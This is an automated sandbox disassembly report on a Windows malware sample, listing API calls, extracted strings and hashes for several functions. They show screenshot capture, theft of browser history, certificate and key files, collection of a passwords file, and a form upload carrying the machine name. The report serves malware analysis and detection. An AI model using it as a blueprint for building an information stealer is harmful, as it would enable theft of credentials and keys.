                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1B431214306ABE7319F689C59FEBBBACEB86714F04851CFB859B1C4DB70D90487A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 012F2053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 012F2064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 012F2079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 012F208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 012F20A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00660046,?,?,00660046), ref: 012F20D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?,?,?,00660046,?,?,00660046), ref: 012F20EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 012F215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F216F
                                                                                                                                                                                                              • GetDIBits.GDI32(00660046,00000000,00000000,?,00000000,?,00000000), ref: 012F218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F21A6
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F21CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,00000042,00660046,?), ref: 012F21EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 012F2209
                                                                                                                                                                                                              • LocalFree.KERNEL32(00660046), ref: 012F2214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 012F224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 012F2260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 012F2270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 012F228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 012F22A3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 012F22B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F22CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F22DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 012F22EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000000,?,00000000), ref: 012F22FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00660046), ref: 012F2308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00660046), ref: 012F230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F2323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F2335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000,?,?,00660046,?,?,00660046), ref: 012F2340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 012F234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 012F2358
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 532523266-808120212
                                                                                                                                                                                                              • Opcode ID: 50bfdf1d631c2f10a9a2a934403e7b0ed877aa73e3f195d8a55e104b7b93a828
                                                                                                                                                                                                              • Instruction ID: 6cd690d09369470ba37b3314315563c38c41af9672653947583f48cdc06929b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50bfdf1d631c2f10a9a2a934403e7b0ed877aa73e3f195d8a55e104b7b93a828
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20914CB2105301AFE320AF64DC88EABBBECFF89755F00491DF68596284D774DA05CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125), ref: 012FF9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133DDC8,00000000), ref: 012FFA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFA2F
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133DDC8), ref: 012FFA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0133DDC8,00000000), ref: 012FFA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(0133DDC8), ref: 012FFA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?), ref: 012FFAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D998,00000000), ref: 012FFB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFB17
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D998), ref: 012FFB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D998,00000000), ref: 012FFB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FFB69
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FFB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D998), ref: 012FFB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FFB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FFB91
                                                                                                                                                                                                              • memset.MSVCRT(0133DDC8,00000000,00000104), ref: 012FFBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FFC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 012FFC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 012FFC6F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FFC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FFC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FFC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FFCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FFCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FFCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FFCBD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$#680DirectoryFolderMakeSystem$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 61c5c125$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$\*.bk$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 30728639-3232212359
                                                                                                                                                                                                              • Opcode ID: cc911e23bb209fd92cc3c21496a5ef771aef3e773e0aa92a71c8e3368b58efd9
                                                                                                                                                                                                              • Instruction ID: 6695c9bb56188a6c8a8c1c0e252de413782a2d18d6a540a934ab30318b984102
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc911e23bb209fd92cc3c21496a5ef771aef3e773e0aa92a71c8e3368b58efd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF91F4315007469FDB32AF789928BAABFE8FF4A705F54805CEA85D7341EB708904CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F3BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012F3C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012F3C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 012F3C85
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s%u.zip,01339D68,00000000), ref: 012F3CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 012F3CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012F3CD6
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 012F3D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,00000001,012E405C,775B5CE0), ref: 012E5D61
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012E5D9D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012E5DAA
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012E5DC9
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?,?,00000001), ref: 012E5DF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5E80
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5E83
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5E90
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5E93
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012E5EA8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5F31
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5F3E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5F45
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012E5F5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 012E5FE0
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E5FE3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E5FF0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E5FF3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E6042
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,012F3AB4,00000000), ref: 012E6051
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,012F3A9B,012F3AB4,00000000,00000000), ref: 012E6066
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$Path$FolderFreeValidate$AttributesBackslashCreateDeleteLockPointerWrite
                                                                                                                                                                                                              • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E7C80: #680.SHELL32 ref: 012E7C8A
                                                                                                                                                                                                                • Part of subcall function 012E7C80: memset.MSVCRT(?,00000000,00000103), ref: 012E7CC1
                                                                                                                                                                                                                • Part of subcall function 012E7C80: memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103), ref: 012E7CD9
                                                                                                                                                                                                                • Part of subcall function 012E7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E7CFB
                                                                                                                                                                                                                • Part of subcall function 012E7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104), ref: 012E7D21
                                                                                                                                                                                                                • Part of subcall function 012E7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7DAD
                                                                                                                                                                                                                • Part of subcall function 012E7C80: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 012E8105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012E8112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 012E8124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012E8145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E8157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 012E81A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 012E81D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 012E8205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E8238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E8245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E8248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 012E8253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012E8285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E82A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E82BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E82CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 012E82F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 012E830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$#680AllocBlinkCaretQueryTimeValueclosesocket
                                                                                                                                                                                                              • String ID: 9E2B3C3Ba$9e2b3cbaa$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Mw
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FC86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FC8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FC8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FC8F1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FC8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FC90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FC911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 012FC923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 012FC936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 012FC947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FC992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FC99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$#680AttributesBackslashCreateDeleteDirectoryFolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61C5C0CB$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Mw$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 1722025706-1585194670
                                                                                                                                                                                                              • Opcode ID: 4350f3a2a40957b48770b308066b1e9f527537237801f96fd806eae1d05e7746
                                                                                                                                                                                                              • Instruction ID: 0769deaa805662fc9806a37f77248ce52d2e6974b87db348a49f31577b217571
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4350f3a2a40957b48770b308066b1e9f527537237801f96fd806eae1d05e7746
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E910A3195021E9BDB36EF78D858FFABBA8AF45704F0441ACEB49D7245DB709908CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FEB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3), ref: 012FEB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEBC3
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FEC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FEC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?), ref: 012FEC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 012FECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FECAC
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 012FECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 012FED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 012FED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FEDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FEDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FEDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FEDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$#680AttributesBackslashFolderHandleMakeMutexProcessSystem$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 61c5c1a3$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Mw$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3642362227-2512274121
                                                                                                                                                                                                              • Opcode ID: 31bb15a6458da3612637a728b2cb4fe12424886b91b3a1cb70064f3f5857cceb
                                                                                                                                                                                                              • Instruction ID: b2c7890ca12e4e7a247010d13af846c72b33eafb0c053536dece1fa84fd3a85b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31bb15a6458da3612637a728b2cb4fe12424886b91b3a1cb70064f3f5857cceb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A571E8305003569FDB32AF389858BEA7BACAF45701F16819CFB85D7295DA70D644CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 012F84B2
                                                                                                                                                                                                              • malloc.MSVCRT(-00000004), ref: 012F8513
                                                                                                                                                                                                              • sprintf.MSVCRT(00000000,%s.dbf,00000000), ref: 012F8522
                                                                                                                                                                                                              • calloc.MSVCRT(00000001,0000003C), ref: 012F852C
                                                                                                                                                                                                              • fopen.MSVCRT(00000000,?), ref: 012F8539
                                                                                                                                                                                                              • sprintf.MSVCRT(00000000,%s.DBF,00000000), ref: 012F854F
                                                                                                                                                                                                              • fopen.MSVCRT(00000000,?), ref: 012F855A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F856C
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F856F
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F857B
                                                                                                                                                                                                              • malloc.MSVCRT(000001F4), ref: 012F85A1
                                                                                                                                                                                                              • fread.MSVCRT(00000000,00000020,00000001,772D7310), ref: 012F85AF
                                                                                                                                                                                                              • fclose.MSVCRT(772D7310), ref: 012F85BE
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F85CB
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 012F85CE
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F8631
                                                                                                                                                                                                              • realloc.MSVCRT(00000000,?), ref: 012F863C
                                                                                                                                                                                                              • fseek.MSVCRT(00000000,00000020,00000000), ref: 012F8651
                                                                                                                                                                                                              • fread.MSVCRT(00000000,?,00000001,00000000), ref: 012F8661
                                                                                                                                                                                                              • fclose.MSVCRT(00000000), ref: 012F8672
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F868E
